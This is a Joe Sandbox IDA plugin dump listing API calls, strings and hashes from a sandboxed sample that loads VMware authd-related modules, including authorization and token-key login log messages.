                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: authd.policy.allowRCForRead$vmauthd.startupTimeout$vmware
                                                    • API String ID: 2642810717-3237359284
                                                    • Opcode ID: 29e3c4f8bb57d708be2beaca962707b503985b7cf66314260ecb5be5c6d30115
                                                    • Instruction ID: bc50bd3e30c644df3e22ca1fc253361eab5d138ac0452dd0469497173ce76e1f
                                                    • Opcode Fuzzy Hash: 29e3c4f8bb57d708be2beaca962707b503985b7cf66314260ecb5be5c6d30115
                                                    • Instruction Fuzzy Hash: C001B530D022086AC700BBA5DC8399E7BF8DF10300B00206BB914B7393DB741A478796
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF80E1D
                                                    • DName::operator+.LIBCMT ref: 6CF80F60
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                    • DName::operator+.LIBCMT ref: 6CF80FAC
                                                    • DName::operator+.LIBCMT ref: 6CF80FBB
                                                    • DName::operator+.LIBCMT ref: 6CF80F0B
                                                      • Part of subcall function 6CF8262E: DName::operator=.LIBVCRUNTIME ref: 6CF826BD
                                                    • DName::operator+.LIBCMT ref: 6CF810E7
                                                    • DName::operator=.LIBVCRUNTIME ref: 6CF81127
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF8113F
                                                    • DName::operator+.LIBCMT ref: 6CF8114E
                                                    • DName::operator+.LIBCMT ref: 6CF8115A
                                                      • Part of subcall function 6CF8262E: Replicator::operator[].LIBCMT ref: 6CF8266B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                                    • String ID:
                                                    • API String ID: 1026175760-0
                                                    • Opcode ID: aa8a58d7c3cc54346c894761dc95bf9c1de6fadb32f106f797cd6e300298d80d
                                                    • Instruction ID: 633e7194def5c057e1d86f1d0a93ee67fe03e5616240169ac26b636a8336496e
                                                    • Opcode Fuzzy Hash: aa8a58d7c3cc54346c894761dc95bf9c1de6fadb32f106f797cd6e300298d80d
                                                    • Instruction Fuzzy Hash: AFC1C572E02248DFDB10CFA4D855BEEBBF8EB09308F10855EE159A7680EB71A549CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 6CF94B1C
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95284
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95296
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952A8
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952BA
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952CC
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952DE
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952F0
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95302
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95314
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95326
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95338
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF9534A
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF9535C
                                                    • _free.LIBCMT ref: 6CF94B11
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF94B33
                                                    • _free.LIBCMT ref: 6CF94B48
                                                    • _free.LIBCMT ref: 6CF94B53
                                                    • _free.LIBCMT ref: 6CF94B75
                                                    • _free.LIBCMT ref: 6CF94B88
                                                    • _free.LIBCMT ref: 6CF94B96
                                                    • _free.LIBCMT ref: 6CF94BA1
                                                    • _free.LIBCMT ref: 6CF94BD9
                                                    • _free.LIBCMT ref: 6CF94BE0
                                                    • _free.LIBCMT ref: 6CF94BFD
                                                    • _free.LIBCMT ref: 6CF94C15
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 14f9b37c24d219153ca044890d50a113391d5eab5ec5c01e4fc5d00f27fc47eb
                                                    • Instruction ID: 263369027750a9602024c7a7903348f6983947365e0545d8d50b549fb97fe8f2
                                                    • Opcode Fuzzy Hash: 14f9b37c24d219153ca044890d50a113391d5eab5ec5c01e4fc5d00f27fc47eb
                                                    • Instruction Fuzzy Hash: 01316D32605600DFFF518F39D940B86BBF8EF52718F20551AE479D7A90DB32E8458B20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(Received GLOBAL command: %s,?), ref: 00ED173E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • vmware-hostd, xrefs: 00ED17E5
                                                    • failed., xrefs: 00ED17F8
                                                    • Received GLOBAL command: %s, xrefs: 00ED1739
                                                    • hostd connection to %s%s, xrefs: 00ED1804
                                                    • User not authorized for host agent contact, xrefs: 00ED17BB
                                                    • Command '%s%s' not authorized for hostd contact, xrefs: 00ED1778
                                                    • Global command %s%s to non-host agent targets not supported, xrefs: 00ED17AE
                                                    • Invalid arguments to '%s', xrefs: 00ED174E
                                                    • ha-nfc, xrefs: 00ED1797
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: failed.$Command '%s%s' not authorized for hostd contact$Global command %s%s to non-host agent targets not supported$Invalid arguments to '%s'$Received GLOBAL command: %s$User not authorized for host agent contact$ha-nfc$hostd connection to %s%s$vmware-hostd
                                                    • API String ID: 2415109466-3597576495
                                                    • Opcode ID: 960d192b5fa59341fe263f267a33a7f52c10bc9f5caf76b456112cebb4987821
                                                    • Instruction ID: 8c454502f5b377537aa35fadeedd44a2be319a177cbf97ca8fddbc6dc4ad150a
                                                    • Opcode Fuzzy Hash: 960d192b5fa59341fe263f267a33a7f52c10bc9f5caf76b456112cebb4987821
                                                    • Instruction Fuzzy Hash: 9521E73278034037E7301659EC07F977799CB92B6AF082077FB08797D1D1915A5392D6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3907804496
                                                    • Opcode ID: 5264fc33b70e6cf56b5b8166d16e30800dc3cd9764c95f03541c6f74b34dd864
                                                    • Instruction ID: 9b5445fa6a955be24543a15ed658aea7f20382ae7f1bcb0e96985d6ba61ed7d5
                                                    • Opcode Fuzzy Hash: 5264fc33b70e6cf56b5b8166d16e30800dc3cd9764c95f03541c6f74b34dd864
                                                    • Instruction Fuzzy Hash: EDC12879E062059FDF01CFA8C884BEDBBB0BF4A318F104159E850ABB91C770D945CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF997B4: CreateFileW.KERNEL32(00000000,00000000,?,6CF99BA4,?,?,00000000,?,6CF99BA4,00000000,0000000C), ref: 6CF997D1
                                                    • GetLastError.KERNEL32 ref: 6CF99C0F
                                                    • __dosmaperr.LIBCMT ref: 6CF99C16
                                                    • GetFileType.KERNEL32(00000000), ref: 6CF99C22
                                                    • GetLastError.KERNEL32 ref: 6CF99C2C
                                                    • __dosmaperr.LIBCMT ref: 6CF99C35
                                                    • CloseHandle.KERNEL32(00000000), ref: 6CF99C55
                                                    • CloseHandle.KERNEL32(6CF91DE0), ref: 6CF99DA2
                                                    • GetLastError.KERNEL32 ref: 6CF99DD4
                                                    • __dosmaperr.LIBCMT ref: 6CF99DDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: ea6a635f50f475b38d9ed55b61f75984074d3b6a6f364f82b1735b6c979a8401
                                                    • Instruction ID: 3fc251e7474bf99c75d8280829d1586b7ce9d8f74d6b28bf4e9a2cc8620a0e91
                                                    • Opcode Fuzzy Hash: ea6a635f50f475b38d9ed55b61f75984074d3b6a6f364f82b1735b6c979a8401
                                                    • Instruction Fuzzy Hash: 41A11432A141458FEF19DF68CC91BAE3BB1AF07328F19025DE815AF390CB359A16CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58C86
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58CA8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58CC8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58CEF
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58D68
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CF58DB4
                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CF58DCE
                                                      • Part of subcall function 6CF82FF3: _free.LIBCMT ref: 6CF83006
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58E63
                                                    • std::_Facet_Register.LIBCPMT ref: 6CF58E70
                                                      • Part of subcall function 6CF766EC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CF766F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister_freestd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 1536214518-1405518554
                                                    • Opcode ID: 2fd867fbc9dd836ce0efd87a7cf5ef30d8ae4551c617baa79fa7c8768dc7ffd4
                                                    • Instruction ID: 2a67f16aaa38087010ae59812eef3af06733cfd4d69f5c185970e2b0ecb53887
                                                    • Opcode Fuzzy Hash: 2fd867fbc9dd836ce0efd87a7cf5ef30d8ae4551c617baa79fa7c8768dc7ffd4
                                                    • Instruction Fuzzy Hash: 08619CB1E11249DBEB10CFA8D944BDEBBB4BF14308F14041AE915AB740EB74E909CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                    • Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000,00000000), ref: 00ED2BB6
                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 00ED2BFA
                                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000), ref: 00ED2C0E
                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00ED2C1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warningfgets$_strnicmpfclosefree
                                                    • String ID: vmware-vmx-stats.exe
                                                    • API String ID: 1422050075-4079124726
                                                    • Opcode ID: 61f00a217a1742d47c97939563e84b5fd60f2c9820728bb334455f0b27083528
                                                    • Instruction ID: 67f5d9400b9027b403b211c6efa7fa1bcf36626d00567ace4cf62d22de7864aa
                                                    • Opcode Fuzzy Hash: 61f00a217a1742d47c97939563e84b5fd60f2c9820728bb334455f0b27083528
                                                    • Instruction Fuzzy Hash: 1241F8719002086FDB119BA5AC45BAEBBACDF55318F0410ABFE04F3342E6369E5A8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WaitForMultipleObjectsEx.KERNEL32(?,?,00000000,000000FF,00000001), ref: 00ED5B12
                                                    • accept.WS2_32(?,00000000,00000000), ref: 00ED5B2E
                                                    • accept.WS2_32(?,00000000,00000000), ref: 00ED5B4D
                                                    • GetLastError.KERNEL32 ref: 00ED5B65
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00ED5BA6
                                                    • GetLastError.KERNEL32 ref: 00ED5BB4
                                                    • FlushFileBuffers.KERNEL32(?), ref: 00ED5BD3
                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 00ED5BE9
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00ED5C15
                                                    Strings
                                                    • Accept on local socket failed (%d)., xrefs: 00ED5B6C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$ConnectErrorLastaccept$BuffersDisconnectFileFlushMultipleObjectsWait
                                                    • String ID: Accept on local socket failed (%d).
                                                    • API String ID: 3041817889-797927945
                                                    • Opcode ID: 645281f8afc36a6f494d2a63a27dcf14eb2665721b66261632b0d1361002ddee
                                                    • Instruction ID: ccbe1e93c4781223834eae47ee351abab835b6b473e6c1eadd191f5a19bc0901
                                                    • Opcode Fuzzy Hash: 645281f8afc36a6f494d2a63a27dcf14eb2665721b66261632b0d1361002ddee
                                                    • Instruction Fuzzy Hash: DA31ABB2000F00AFE7301F25EC09B47BBA5EB05319F241A2BF55AB56E0D372E54ACB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                    • String ID:
                                                    • API String ID: 1464150960-0
                                                    • Opcode ID: 8f787884fb516182201ccf97969d75fa7e818dc969a9b027a9fa786318816ba6
                                                    • Instruction ID: b60e75d54fd38855cf8bcbf61e2b5e46be13c99334f9d333d0969b7d768fc99a
                                                    • Opcode Fuzzy Hash: 8f787884fb516182201ccf97969d75fa7e818dc969a9b027a9fa786318816ba6
                                                    • Instruction Fuzzy Hash: 84E13BB6D0520ADFCB24CF94E485BEFBBB4AB05304F20815BD521ABA50D774964ACFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(received CONNECT_VPXA command: %s,?), ref: 00ED183E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • received CONNECT_VPXA command: %s, xrefs: 00ED1839
                                                    • Global command %s%s to non-vpxa targets not supported, xrefs: 00ED18AE
                                                    • vmware-vpxa, xrefs: 00ED18E5
                                                    • User not authorized for vpx agent contact, xrefs: 00ED18BB
                                                    • Command '%s%s' not authorized for vpxa contact, xrefs: 00ED1878
                                                    • vpxa-nfc, xrefs: 00ED1897
                                                    • Invalid arguments to '%s', xrefs: 00ED184E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Command '%s%s' not authorized for vpxa contact$Global command %s%s to non-vpxa targets not supported$Invalid arguments to '%s'$User not authorized for vpx agent contact$received CONNECT_VPXA command: %s$vmware-vpxa$vpxa-nfc
                                                    • API String ID: 2415109466-3576414198
                                                    • Opcode ID: ab68032f0bab094189ac248ea9cc3be4c3873bb762042c69435d3c686227ee03
                                                    • Instruction ID: 251caeb99b496c5a1975f2f62a2848f985094aa11c7a8570f634579484bf05d5
                                                    • Opcode Fuzzy Hash: ab68032f0bab094189ac248ea9cc3be4c3873bb762042c69435d3c686227ee03
                                                    • Instruction Fuzzy Hash: 1411E73678030476EB202699BC07FD67B49DB51B6AF082073FB0C793C2D29156A293E6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118), ref: 00ED32CF
                                                    • GetLastError.KERNEL32(?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED32DC
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • WSAEventSelect.WS2_32(?,00000000,00000023), ref: 00ED32FF
                                                    • CloseHandle.KERNEL32(?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED330D
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED331A
                                                    • WSAGetLastError.WS2_32(00000000,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED3321
                                                    Strings
                                                    • Call to CreateEvent failed with error %d., xrefs: 00ED32E3
                                                    • WSAEventSelect failed on socket %d with error %d, tid %d., xrefs: 00ED332B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EventWarning$CloseCreateCurrentHandleSelectThread_printf
                                                    • String ID: Call to CreateEvent failed with error %d.$WSAEventSelect failed on socket %d with error %d, tid %d.
                                                    • API String ID: 2101947036-4176423585
                                                    • Opcode ID: 587cb102979dfe03913bb8916cca1b81f968d22b1121061069120eeeef317ac0
                                                    • Instruction ID: ccfb11962f8603d9bb83b9fe8d154aafe508b62d51feca49a8d45eab6c811516
                                                    • Opcode Fuzzy Hash: 587cb102979dfe03913bb8916cca1b81f968d22b1121061069120eeeef317ac0
                                                    • Instruction Fuzzy Hash: E4112672641300AFD7206FA9FC0AF56B7A8EB05B31F00812BF66DA72E0C770A4018B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(attempt to bypass username/password from %.128s,?), ref: 00ED1176
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • Warning.VMWAREBASE(GET TOKEN KEY failed: got %s,?), ref: 00ED11B0
                                                    Strings
                                                    • Login successful., xrefs: 00ED11D8
                                                    • Login failed: token key not found., xrefs: 00ED11B5
                                                    • GET TOKEN KEY failed: got %s, xrefs: 00ED11AB
                                                    • Login from through tokenkey, xrefs: 00ED11CE
                                                    • attempt to bypass username/password from %.128s, xrefs: 00ED1171
                                                    • Login failed: token key authentication not allowed., xrefs: 00ED117B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
